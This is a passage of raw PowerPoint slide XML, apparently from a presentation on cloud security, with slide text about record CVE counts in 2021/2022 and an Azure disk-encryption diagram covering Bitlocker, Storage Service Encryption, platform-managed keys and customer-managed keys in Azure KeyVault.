                    <a:pt x="123" y="132"/>
                    <a:pt x="116" y="135"/>
                    <a:pt x="110"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205" name="Freeform 117">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D958AFC3-E902-804C-9987-028439088BED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22304375" y="661988"/>
              <a:ext cx="58738" cy="57150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 138"/>
                <a:gd name="T1" fmla="*/ 135 h 135"/>
                <a:gd name="T2" fmla="*/ 10 w 138"/>
                <a:gd name="T3" fmla="*/ 127 h 135"/>
                <a:gd name="T4" fmla="*/ 10 w 138"/>
                <a:gd name="T5" fmla="*/ 92 h 135"/>
                <a:gd name="T6" fmla="*/ 92 w 138"/>
                <a:gd name="T7" fmla="*/ 9 h 135"/>
                <a:gd name="T8" fmla="*/ 128 w 138"/>
                <a:gd name="T9" fmla="*/ 9 h 135"/>
                <a:gd name="T10" fmla="*/ 128 w 138"/>
                <a:gd name="T11" fmla="*/ 45 h 135"/>
                <a:gd name="T12" fmla="*/ 46 w 138"/>
                <a:gd name="T13" fmla="*/ 127 h 135"/>
                <a:gd name="T14" fmla="*/ 28 w 1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35">
                  <a:moveTo>
                    <a:pt x="28" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="135"/>
                    <a:pt x="15" y="132"/>
                    <a:pt x="10" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="118"/>
                    <a:pt x="0" y="102"/>
                    <a:pt x="10" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="9"/>
                    <a:pt x="92" y="9"/>
                    <a:pt x="92" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="128" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="19"/>
                    <a:pt x="138" y="35"/>
                    <a:pt x="128" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="127"/>
                    <a:pt x="46" y="127"/>
                    <a:pt x="46" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="132"/>
                    <a:pt x="34" y="135"/>
                    <a:pt x="28"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sp>
          <p:nvSpPr>
            <p:cNvPr id="206" name="Freeform 118">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2680BFBE-F880-694C-BEE0-1E4696459FD2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22650450" y="317500"/>
              <a:ext cx="58738" cy="55563"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 138"/>
                <a:gd name="T1" fmla="*/ 135 h 135"/>
                <a:gd name="T2" fmla="*/ 10 w 138"/>
                <a:gd name="T3" fmla="*/ 128 h 135"/>
                <a:gd name="T4" fmla="*/ 10 w 138"/>
                <a:gd name="T5" fmla="*/ 92 h 135"/>
                <a:gd name="T6" fmla="*/ 92 w 138"/>
                <a:gd name="T7" fmla="*/ 10 h 135"/>
                <a:gd name="T8" fmla="*/ 128 w 138"/>
                <a:gd name="T9" fmla="*/ 10 h 135"/>
                <a:gd name="T10" fmla="*/ 128 w 138"/>
                <a:gd name="T11" fmla="*/ 45 h 135"/>
                <a:gd name="T12" fmla="*/ 46 w 138"/>
                <a:gd name="T13" fmla="*/ 128 h 135"/>
                <a:gd name="T14" fmla="*/ 28 w 1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135">
                  <a:moveTo>
                    <a:pt x="28" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="135"/>
                    <a:pt x="15" y="133"/>
                    <a:pt x="10" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="118"/>
                    <a:pt x="0" y="102"/>
                    <a:pt x="10" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="10"/>
                    <a:pt x="92" y="10"/>
                    <a:pt x="92" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="128" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="20"/>
                    <a:pt x="138" y="36"/>
                    <a:pt x="128" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="128"/>
                    <a:pt x="46" y="128"/>
                    <a:pt x="46" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="133"/>
                    <a:pt x="34" y="135"/>
                    <a:pt x="28"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8709" tIns="19354" rIns="38709" bIns="193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762" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B365831C-2BEF-4ED9-A24B-5593EF6662A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471771" y="531341"/>
            <a:ext cx="11018520" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3000" b="1" kern="1200" baseline="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nb-NO" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>2021/2022 – The years we got new sad records...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="CVE Daily Average-1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68DA87C6-DCCF-4768-8FAA-FB3C34D40C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2861" y="2888898"/>
            <a:ext cx="4376621" cy="3282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88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6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831D7-CE6E-4A80-9DCB-13E7788DCA7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="499533"/>
            <a:ext cx="10772775" cy="1658198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A15529E2-9CF4-2D2C-5DE2-7299BB7FFA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1687058017"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="676275" y="2373549"/>
          <a:ext cx="10753725" cy="35992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27552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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26311BAF-DE06-4A8F-82CB-4FE6405FAF60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8889738" y="1214854"/>
            <a:ext cx="2866369" cy="1802561"/>
          </a:xfrm>
          <a:prstGeom prst="round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90B86A8-EE27-4275-8130-A58DB995A99A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9163735" y="1438521"/>
            <a:ext cx="2425415" cy="730205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TekstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63FF5CA-EE6B-4581-8D36-8253D0F65E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10082637" y="1629736"/>
            <a:ext cx="128166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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Storage Disk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle: Rounded Corners 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC0CB7DC-8FE7-4153-A94A-820604DE0679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5196950" y="1229107"/>
            <a:ext cx="2369802" cy="2630273"/>
          </a:xfrm>
          <a:prstGeom prst="round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27CC26D-122C-45DB-BF51-39C27532617C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5381142" y="1445100"/>
            <a:ext cx="1585399" cy="776253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4FDE905-C2AB-4AAF-87F4-CA6AB3E7F250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500558" y="1528792"/>
            <a:ext cx="704850" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TekstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{718C8F28-016F-458B-B0F3-7F928752872B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314296" y="1663727"/>
            <a:ext cx="128166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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>VM01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B444A7BC-0021-4038-9342-BE726DC5938A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9320588" y="1562689"/>
            <a:ext cx="552450" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Arrow: Right 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D8B663-50A6-426A-BFFA-F157974BDF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6999434" y="1379316"/>
            <a:ext cx="2144565" cy="616590"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Read/Write</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5759A1CA-A45B-4A6C-A707-1B47AC43EDEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8657129" y="1994878"/>
            <a:ext cx="666750" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1527CF46-AE58-4793-B1CA-6385E4870F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9262414" y="2181883"/>
            <a:ext cx="25984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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SSE </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="12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nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Storage Service Encryption)</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="12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nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Platform Managed Keys</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Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B931ECE-8DB7-4C95-BA69-084BBE47421A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556457" y="949550"/>
            <a:ext cx="4286253" cy="5661448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>All data encrypted physically on storage nodes with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Bitlocker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Keys Managed by Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(Platform Managed Keys – PMK)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Customer-Managed (CMK) keys using </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>KeyVault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Can also deploy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>KeyVault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> with dedicated HSM solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Ensures securing disks physically in the datacenter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rectangle 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EA8D8FC-ABC3-4D56-9637-69DE3ED1B94F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5446929" y="2997608"/>
            <a:ext cx="1906817" cy="636813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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4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Physical Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="14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45" name="Arrow: Right 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8DD5D8E-99AA-4697-8E55-505326D5D4E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5467491" y="2433782"/>
            <a:ext cx="685799" cy="381548"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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ED8395B9-7EFC-4564-B9BC-31E9E8C7055D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976938" y="2443581"/>
            <a:ext cx="12192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200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Generation 1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Rectangle: Rounded Corners 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45A8458C-F914-4955-A87B-134566D8660D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8889738" y="3696451"/>
            <a:ext cx="2866369" cy="1511302"/>
          </a:xfrm>
          <a:prstGeom prst="round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AB2D6CF1-ED2E-47D1-8970-B9170031413C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9163735" y="3920117"/>
            <a:ext cx="2425415" cy="730205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="TekstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E114A0F6-DCF0-4E23-9888-68194B995347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
